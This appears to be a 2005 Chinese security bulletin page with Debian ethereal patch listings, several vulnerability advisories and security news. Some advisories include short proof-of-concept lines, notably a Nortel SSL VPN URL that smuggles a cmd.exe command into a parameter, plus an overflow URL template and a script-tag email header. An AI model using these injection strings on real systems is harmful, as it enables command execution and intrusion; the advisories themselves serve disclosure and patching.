Size/MD5 checksum: 4685936 54446e011296caf441369bab0bd7aecd
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge4_arm.deb
Size/MD5 checksum:   153890 00002cca682ca3c3abf2e7c97e41e841
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge4_arm.deb
Size/MD5 checksum:   94388 ddf5908a309c89acadac3962dec222c3

Intel IA-32 architecture:

http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge4_i386.deb
Size/MD5 checksum:   442462 22585d584a56ade669ef45e23a460c13
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge4_i386.deb
Size/MD5 checksum: 4491616 db1efd0f3a3f9e5ac03f82f56d435048
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge4_i386.deb
Size/MD5 checksum:   153658 f754988305495aa0babd2ffc6c05dfb7
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge4_i386.deb
Size/MD5 checksum:   89874 7f9b4b8731d3b7cc770d1e81fdf9edff

Intel IA-64 architecture:

http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge4_ia64.deb
Size/MD5 checksum:   673480 2accbfffd291f3b424d0f0203bfeaf95
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge4_ia64.deb
Size/MD5 checksum: 6625668 951a0d38bf3f2ff63fabb3aeed861719
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge4_ia64.deb
Size/MD5 checksum:   153864 151d53ada1dcc87f45bd5c9eac830a8b
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge4_ia64.deb
Size/MD5 checksum:   128148 5b970496851ecc3c8034c4a6050d39d9

HP Precision architecture:

http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge4_hppa.deb
Size/MD5 checksum:   488198 16e109738a8788eff83b2a94426bc90d
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge4_hppa.deb
Size/MD5 checksum: 5785972 915abaae95c1620129d982b4f742e998
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge4_hppa.deb
Size/MD5 checksum:   153880 deb9a9396bc7e6b9e4a9c98a3b0997be
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge4_hppa.deb
Size/MD5 checksum:   97420 4d15ca9df16e677ec167e918d1df3262

Motorola 680x0 architecture:

http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge4_m68k.deb
Size/MD5 checksum:   446824 a24b34013583a4e3497a1ebf6142ff22
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge4_m68k.deb
Size/MD5 checksum: 5564090 ec403a6ef8f92839ec3e48c031f427be
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge4_m68k.deb
Size/MD5 checksum:   153992 388cce8ba0ecddede0d2a0eb7b41f976
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge4_m68k.deb
Size/MD5 checksum:   89958 de2aa186345897a64577ed6991de0f16

Big endian MIPS architecture:

http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge4_mips.deb
Size/MD5 checksum:   461508 944dbf1184d71f3420aa0e0f998e4951
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge4_mips.deb
Size/MD5 checksum: 4722696 7ecb7db0539d885c010141d2307d2309
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge4_mips.deb
Size/MD5 checksum:   153882 b4ffbc14b75db5a2d80ea8ab2dc098d9
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge4_mips.deb
Size/MD5 checksum:   93670 edfbeb906903497b741ce491d062fe8d

Little endian MIPS architecture:

http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge4_mipsel.deb
Size/MD5 checksum:   456796 61db19e60b59ca08539139f133161ecd
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge4_mipsel.deb
Size/MD5 checksum: 4458954 3f85051d87e652474f35c93df894668d
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge4_mipsel.deb
Size/MD5 checksum:   153896 6b4fa165eb5fc6c85ea5443f9cc8627c
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge4_mipsel.deb
Size/MD5 checksum:   93596 f3fbc2765b9eef5589ae8b67b3fc507b

PowerPC architecture:

http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge4_powerpc.deb
Size/MD5 checksum:   454624 ac160f2dfaf9480ec2ddb284b16969b2
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge4_powerpc.deb
Size/MD5 checksum: 5069322 b505bbd6c34a9fc83d3ab34161751b89
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge4_powerpc.deb
Size/MD5 checksum:   153888 0ac314e84694a76fd5475f8318c0bd0c
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge4_powerpc.deb
Size/MD5 checksum:   93460 89763605c5fc59034a6b3b4399920a51

IBM S/390 architecture:

http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge4_s390.deb
Size/MD5 checksum:   478832 f58c4f3e2f5f185cb40818aad6bcba76
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge4_s390.deb
Size/MD5 checksum: 5620232 a8ad7eceaa81bbacbd70a3f4d2201edf
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge4_s390.deb
Size/MD5 checksum:   153878 837cf0ef9571ee6abdeb382d54412d90
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge4_s390.deb
Size/MD5 checksum:   98982 e5bad7bb8bf3964b47b41ec84b62e342

Sun Sparc architecture:

http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge4_sparc.deb
Size/MD5 checksum:   464160 3e21acc4249b2032b1d7ed474486189e
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge4_sparc.deb
Size/MD5 checksum: 5127616 f418acff6a83220d1b3ba544856b60ed
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge4_sparc.deb
Size/MD5 checksum:   153870 e45257dbd6a4799b26be761fcc79e835
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge4_sparc.deb
Size/MD5 checksum:   92840 aa61f8545872884a69df77aa3a8e35d6

补丁安装方法：

1. 手工安装补丁包：

首先，使用下面的命令来下载补丁软件：
# wget url (url是补丁下载链接地址)

然后，使用下面的命令来安装补丁：
# dpkg -i file.deb (file是相应的补丁名)

2. 使用apt-get自动安装补丁包：

  首先，使用下面的命令更新内部数据库：
  # apt-get update
 
  然后，使用下面的命令安装更新软件包：
  # apt-get upgrade

Ethereal Group
--------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://anonsvn.ethereal.com/viewcvs/viewcvs.py/trunk/epan/dissectors/packet-ospf.c?rev=16507&view=markup

Mozilla Firefox历史文件缓冲区溢出漏洞

发布日期：2005-12-08
更新日期：2005-12-08

受影响系统：
Mozilla Firefox 1.5
描述：
________________________________________
BUGTRAQ ID: 15773

Mozilla Firefox是一款非常流行的开放源码WEB浏览器。

Mozilla Firefox在处理很大的history.dat文件时存在缓冲区溢出漏洞，远程攻击者可能利用此漏洞进行拒绝服务攻击。

如果恶意站点能够将过多的数据存储在受影响的文件中的话，则用户受骗访问了该站点时就会耗尽资源，导致拒绝服务。

<*来源：ZIPLOCK
*>

建议：
________________________________________
厂商补丁：

Mozilla
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.mozilla.org/
Microsoft Excel内存破坏漏洞

发布日期：2005-12-08
更新日期：2005-12-08

受影响系统：
Microsoft Excel 97
Microsoft Excel 2003
Microsoft Excel 2002
Microsoft Excel 2000
描述：
________________________________________
BUGTRAQ ID: 15780

Microsoft Excel是Office产品套件中的电子表格和分析程序。

Microsoft Excel中存在安全漏洞，攻击者可能利用此漏洞在机器上执行指令。

如果能够通过Excel .xls文件的数据字段向"msvcrt.memmove()"传送很大的值的话，就可能执行任意代码。

<*来源：fearwall
*>

建议：
________________________________________
厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/technet/security/
Horde Nag远程HTML注入漏洞

发布日期：2005-12-12
更新日期：2005-12-12

受影响系统：
Horde Nag 2.0.3
Horde Nag 2.0.2
Horde Nag 2.0.1
Horde Nag 2.0
Horde Nag 1.1.3
Horde Nag 1.1.2
Horde Nag 1.1.1
Horde Nag 1.1
不受影响系统：
Horde Nag 2.0.4
描述：
________________________________________
BUGTRAQ ID: 15804

Horde Nag是一套可实现简单多用户任务管理器的PHP脚本。

Horde的Nag模块没有正确的过滤记事本的名称，远程攻击者可能利用此漏洞诱使用户执行任意JavaScript代码。

攻击者可以在记事本名称中插入任意JavaScript代码。如果用户打开了该文件的话，就可以执行任意代码。

<*来源：Johannes Greil （j.greil@sec-consult.com）

链接：http://marc.theaimsgroup.com/?l=bugtraq&m=113442722132193&w=2
*>

建议：
________________________________________
厂商补丁：

Horde
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

* Horde Upgrade nag-h3-2.0.4.tar.gz
ftp://ftp.horde.org/pub/nag/nag-h3-2.0.4.tar.gz


Nortel SSL VPN跨站脚本/命令执行漏洞

发布日期：2005-12-12
更新日期：2005-12-12

受影响系统：
Nortel Networks SSL VPN 4.2.1.6
描述：
________________________________________
BUGTRAQ ID: 15798

Nortel SSL VPN是远程访问安全解决方案，允许使用安全套接字层（SSL）做为基础安全协议。

Nortel的SSL VPN的WEB界面没有充分的验证用户输入，因此攻击者可以在某些页面的链接中隐藏命令。

由于从这些页面中所调用的Java Applet是经过加密签名的，因此可能以使用浏览器用户的权限执行任意系统命令。

<*来源：Daniel Fabian （d.fabian@sec-consult.com）

链接：http://marc.theaimsgroup.com/?l=bugtraq&m=113443024722657&w=2
*>

测试方法：
________________________________________
警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
https://SSL_VPN_SERVER/tunnelform.yaws?a=+cmd.exe+/c+echo+test+%3E+
c://test.txt+&type=Custom&sp=443&n=1&ph=&pp=&0tm=tcp&0lh=127.0.0.1&
0lp=8080&0hm=&0rh=10.10.10.10&0rp=80&sslEnabled=on&start=Start...

建议：
________________________________________
厂商补丁：

Nortel Networks
---------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.nortelnetworks.com/index.html

Sights'N Sounds流媒体服务器sws.exe缓冲区溢出漏洞

发布日期：2005-12-12
更新日期：2005-12-12

受影响系统：
InnovateWare Sights'n Sounds Streaming Media Server 2.0.3.b
描述：
________________________________________
BUGTRAQ ID: 15809

Sights'n Sounds是一款简单易用的流媒体服务器。

Sights'n Sound的MediaServerListing.exe中存在缓冲区溢出漏洞，远程攻击者可能利用此漏洞在主机上执行任意指令。

如果用户能够提供1200个字符长的字符串做为mediaserverlisting.exe的参数的话，就可能允许用户完全入侵远程系统。

<*来源：dr_insane （dr_insane@pathfinder.gr）

链接：http://www.ipomonis.com/advisories/sws.txt
*>

测试方法：
________________________________________
警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
http://[host]/MediaServerListing.exe?[long_string]

建议：
________________________________________
厂商补丁：

InnovateWare
------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.download.com/Sights-n-Sounds-Streaming-Media-Server/3000-2168_4-10247732.html

NetGear RP114 SYN Flood拒绝服务漏洞

发布日期：2005-12-12
更新日期：2005-12-12

受影响系统：
Netgear RP114 3.26
描述：
________________________________________
BUGTRAQ ID: 15816

NetGear RP114是一款宽带接入路由器，适用于各类线路及各种接入方式。

NetGear RP114在处理大量的恶意网络流量时存在漏洞，导致设备无法正常工作。

攻击者可以通过对NetGear RP114设备的外部接口发送TCP SYN flood导致无法使用内外接口之间的路由，这样合法用户就无法访问连接的网络（如WAN/Internet）。

<*来源：Marc Ruef （marc.ruef@computec.ch）

链接：http://marc.theaimsgroup.com/?l=bugtraq&m=113443727003302&w=2
*>

建议：
________________________________________
厂商补丁：

Netgear
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.netgear.com/

Alt-N MDaemon/WorldClient邮件标题拒绝服务漏洞

发布日期：2005-12-12
更新日期：2005-12-12

受影响系统：
Alt-N MDaemon 8.1.3
Alt-N WorldClient 8.1.3
描述：
________________________________________
BUGTRAQ ID: 15815

Alt-N MDaemon是一款基于Windows的邮件服务程序，WorldClient是其客户端。

Alt-N MDaemon在处理邮件标题时存在漏洞，远程攻击者可能利用此漏洞使用户执行一些恶意代码。

如果用户使用Worldclient服务（默认在3000端口）接收邮件消息的话，浏览器就会自动重新定向到指定用户的收件箱文件夹。但攻击者可以通过发送标题中包含有一些JavaScript的消息来阻断用户的收件箱文件夹，导致无法使用该文件夹，用户无法读取新的邮件消息。

<*来源：dr_insane （dr_insane@pathfinder.gr）

链接：http://www.ipomonis.com/advisories/mdaemon.zip
*>

测试方法：
________________________________________
警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
创建标题为<Script></script>的邮件消息。

建议：
________________________________________
厂商补丁：

Alt-N
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.altn.com

SCO UnixWare UIDAdmin本地溢出漏洞

发布日期：2005-12-12
更新日期：2005-12-12

受影响系统：
SCO Unixware 7.1.4
SCO Unixware 7.1.3
描述：
________________________________________
BUGTRAQ ID: 15811
CVE(CAN) ID: CVE-2005-3903

UnixWare是由SCO公司开发和维护的商业性质Unix操作系统。

Unixware捆绑的uidadmin二进制程序中存在本地溢出漏洞，本地攻击者可能利用此漏洞提升自己的权限。

如果攻击者能够创建大于1600字节的文件并使用uidadmin的"-S"选项提供该文件路径的话，就会导致栈溢出，允许以root用户权限执行任意代码。

<*来源：iDEFENSE

链接：http://www.idefense.com/application/poi/display?id=350&type=vulnerabilities&flashstatus=true
*>

建议：
________________________________________
临时解决方法：

* 从ppp二进制程序删除setuid位：

chmod u-s /unixware/usr/bin/uidadmin

厂商补丁：

SCO
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.54

二:安全信息
________________________________________
________________________________________
安全专家警告称新一轮Sober蠕虫攻击倒计时

发布日期：2005-12-09
eNet硅谷动力
　　【eNet硅谷动力消息】安全专家日前发出警告称，正如全球电子邮件系统设法消除上次大规模泛滥的大量电子邮件蠕虫事件一样，新一轮大规模Sober蠕虫攻击可能很快就会爆发。
　　VeriSign公司旗下的iDefense安全公司在星期三发表声明称，与11月22日发起网络攻击的Sober蠕虫不太一样，下一次网络攻击可能会采用非弹性编码(hard-coded)版本的Sober蠕虫。 IDefense安全公司称，受Sober蠕虫感染的计算机将下载各种指令并且可能在1月5日发出大量电子邮件，展开新一轮的Sober蠕虫邮件攻击。
　　这样，因特网用户们就只剩下不到一个月的时间来构筑防卫Sober蠕虫攻击的保护罩了。iDefense公司安全专家称，Sober蠕虫是2005年变种最多、发起攻击次数最多的蠕虫。
　　IDefense公司称：“这种网络攻击可能会对因特网信息流通造成严重的不利影响，因为电子邮件服务器上的电子邮件届时将会泛滥成灾。”
　　芬兰F-Secure防病毒公司的首席研究官Mikko Hypponen说，这起可能爆发的蠕虫攻击是可以被中止的。蠕虫将从免费网络空间供应商的系统管理的许多网站处下载各种指令。 他说，这些免费网络空间大部分都位于德国和奥地利。
　　Hypponen说：“管理这些免费网站的公司应该可以在一月份的时候阻止这些病毒从某些特定网址进行下载，因此如果幸运的话，什么事都不会发生。时间对于因特网服务商和防病毒专家来说是足够的。”
　　最新的Sober蠕虫变体现在仍然令电子邮件用户们十分头疼。微软公司在上个星期称，如果邮件中包含了受感染的信息，就会不定时地延迟发送到hotmail和MSN电子邮件服务的电子邮件。 Hypponen说，F-Secure公司在星期三拦截的所有病毒中，Sober蠕虫几乎占了40%。
　　IDefense公司称，Sober蠕虫家族可能是由德国的某个病毒编写者或者一群病毒编写者所编写的。iDefense公司说，自从2003年10月以来，已经发现了这种蠕虫的近30种变体。
　　Sober蠕虫通常都是作为电子邮件的附件进行传播。电子邮件的正文大都不一样，既可以是德文的也可以是英文的。 有些Sober蠕虫电子邮件中包含了许多纳粹的宣传资料，还有一些电子邮件中贴的是美国联邦调查局、英国国家打击高科技犯罪机构和美国中央情报局的信息。
　　IDefense公司认为，即将在1月5日爆发的大规模Sober蠕虫攻击可能会散播更多的纳粹宣传资料。 Sober蠕虫攻击爆发的日期正好是纳粹党成立87周年纪念日。
微软：感谢Google解决IE漏洞

发布日期：2005-12-11
驱动之家
  本周早些时候，Google曾就微软IE的CSS格式处理漏洞发布修复工具，帮助减轻漏洞隐患对IE的影响，为此，微软开发人员今天正式向Google同行们致谢，微软官方IE修复补丁也已进入紧密开发中。
  IE 新漏洞由以色列黑客Matan Gillon发现：Internet Explorer导入CSS格式页面的方式存在缺陷，使攻击者以用户名义获得个人数据，或者是远程执行操作。如果用户同时还安装了Google的 Desktop Search，潜在破坏力将更强－－用户所有个人资料将露无遗。
“根据我们的调查，该漏洞需要引导用户打开特定页面才可以发动进攻，因此其冲击效果有限。”微软安全调查部门员工Michael Howard表示。
  Gillon还提供了相关证据，证明恶意代码与Google News结合有可能放大的潜在危害，不过，Google已经对存在的问题进行了修复。
  “Google做了一件好事，及时保护了我们共有客户的服务器/PC数据安全，他们的工作十分出色。”Howard补充说。
  “交叉域名安全隐患目前依旧存在于IE浏览器中，但是我们向您保证，微软正在就该隐患进行全面调查，一旦调查完成，我们将立刻将新IE补丁提供给所有微软客户。”
  另外，Gillon此前已经表示，利用该漏洞的攻击针对IE6和Google桌面搜索工具2.0, 也可能适用于其他版本的IE。不过，使用火狐、Opera等非IE浏览器的用户则无需担忧。而IE用户可以通过禁止Javascript脚本运行来防范这种攻击。


思科路由器等非PC设备明年成黑客攻击重点

发布日期：2005-12-13
赛迪网
  12月12日消息，据安全厂商赛门铁克公司称，移动设备、思科的路由器、甲骨文的软件在明年及以后的时间将成为黑客的攻击目标，当然了，同样会受到黑客青睐的还有微软公司的WindowsVista操作系统。
  微软经常发布的补丁软件、美国系统网络安全协会（SANSInstitute）的研究、蠕虫攻击表明，新一代的Windows操作系统将是黑客的“大餐”。
  赛门铁克认为，安全领域最大的发展之一将是对其它设备和平台的攻击。随着网络和用户设备日益智能化，处理能力日益强大，它们就可能成为黑客的攻击目标。赛门铁克安全响应中心的主任科尔表示，我们发现，攻击的重点正在转向非PC设备：路由器、交换机、备份设备，这就像打鼹鼠，打了一个，另一个又出来了。我们需要确保整个基础设施都受到保护。
  尽管攻击还没有大范围爆发，随着软件实现了互操作，财务资料被存储到它们的硬盘和网络上，手机和便携设备受到攻击的可能将日益提高。科尔说，尽管VoIP将在未来一年内高速发展，但它并非是一个容易受到攻击的目标。
  科尔表示，黑客将继续转向有目标的攻击。赛门铁克的实验室发现了攻击事件日益带有经济利益倾向，bot攻击的发展在加速。新的法律和法规将使广告件和间谍件更不普及。
  赛门铁克认为，即使是在传统的非针对性攻击中，恶意代码也将寻找新的攻击途径━━例如网站和即时通讯。科尔表示，哪里有经济利益，那里就有攻击发生。黑客永远在不停地寻求能够获取巨额经济利益的最简单途径。

微软发布12月安全补丁 修复两个严重IE漏洞

发布日期：2005-12-14
赛迪网
　　【赛迪网讯】12月14日消息，微软星期二发布了修复一个重要的Windows安全漏洞的补丁。黑客利用这个漏洞能够对IE用户实施在线攻击。 (立即下载更新补丁)
　　据news.com.com网站报道，作为每月发布一次安全补丁周期的一部分，微软在MS05-054安全公告中发布了这个安全补丁。微软本月发布的安全补丁还修复了IE浏览器中的其它三个安全漏洞，其中一个也被认为是严重的安全漏洞。但是，微软表示，它还没有发现任何恶意代码利用这个安全漏洞。
　　微软在安全公告中指出，黑客成功地利用IE浏览器中的上述两个严重的安全漏洞就能够控制受此安全漏洞影响的计算机。所有版本的Windows支持的当前版本的IE浏览器都存在这些安全漏洞。
　　IE浏览器的安全补丁还解决了索尼BMG音乐娱乐公司的根工具包引起的系统崩溃的问题。这次发布的IE浏览器安全补丁使IE浏览器能够运行这家唱片公司以前发布的老版本的ActiveX控件。
　　微软发布的安全补丁促使安全软件厂商赛门铁克将其全球威胁状况等级提高到了第二级的水平。这就意味着将会爆发攻击事件。
　　微软表示，这些IE漏洞能够用来制作一个恶意网站。如果计算机用户访问这个网站，这个恶意网站将自动向有漏洞的计算机下载和运行恶意代码。这种攻击将在计算机用户察觉不到的情况下进行。
　　据介绍，IE浏览器中的一个严重安全漏洞存在于IE处理某些文件对象的模式方面。这个问题原来在今年5月份报道过。当时，专家认为这个安全漏洞能够被用来实施拒绝服务攻击，造成IE浏览器崩溃。但是，今年11月份，专家们发现这个安全漏洞能够用来远程执行恶意代码，并且对这个问题发出了警告。
　　本周二修复的另一个严重的IE漏洞与微软在10月、8月和7月份修复的安全漏洞类似。本月的补丁切断了IE浏览器与微软其它软件之间的联系。IE浏览器不恰当地调用其它程序可用来对系统实施攻击。修复的另一个IE漏洞能够让攻击者看到PC用户访问的网站。
　　除了IE之外，微软还发布了MS05-055安全公告，修复了Windows 2000中的一个提高用户权限的安全漏洞。这个安全漏洞能够让攻击者完全控制用户的计算机。不过，这个漏洞需要入侵者能够本地访问这个计算机。

微软计划加强IE7安全性 防止恶意代码侵袭

发布日期：2005-12-14
太平洋电脑网
　　在即将发布的IE 7.0浏览器中，微软针对站点的安全性做了一些改变，以减少恶意代码损害用户权益的可能性。
　　目前的IE6.0版本将站点划分为四类——互联网、本地内联网、受信任的站点和受限制的站点——允许用户针对各类站点设置不同的安全规则，例如浏览器可以根据设置来决定是否运行Active X控件，而不必在首次运行时弹出警告窗口。
　　实际上，本地内联网区域与家庭用户无关，因此IE 7.0对此做了改动——若PC不是在一个受管制的局域网中，浏览器就会将表面看来是内联网的站点视为互联网站点——这要归功于微软的一名暑期实习生。
　　受信任的站点区域在新版IE中将被默认设定为“中级”的安全级别，与IE 6.0互联网区域的默认安全级别一样，但终端用户仍可以自主设置特定站点及降低安全级别。
　　而假使电脑在一个域中运行，IE 7.0就会自动察觉内联网站点并回应给内联网区域设置，网络管理员便能设定群组策略以确保浏览器按需要运行。
　　在微软即将发布的Windows Vista操作系统中，如果IE曾经遭到过侵袭，互联网区域就会在“保护模式”下运行以避免再次被攻击。而ActiveX Opt-In将降低互联网中恶意ActiveX控件的潜在危害。
　　微软的工程师们在微软的IE博客上这样写到：微软一直在采取改进措施，以避免浏览器在低安全级别的区域受到恶意代码的攻击。

讨论 http://bbs.pc51.net

上一篇："WORD文档杀手"病毒技术分析报告

下一篇：构造特殊文件名绕过多个反病毒引擎

昵称 (必填)

验证码 (必填)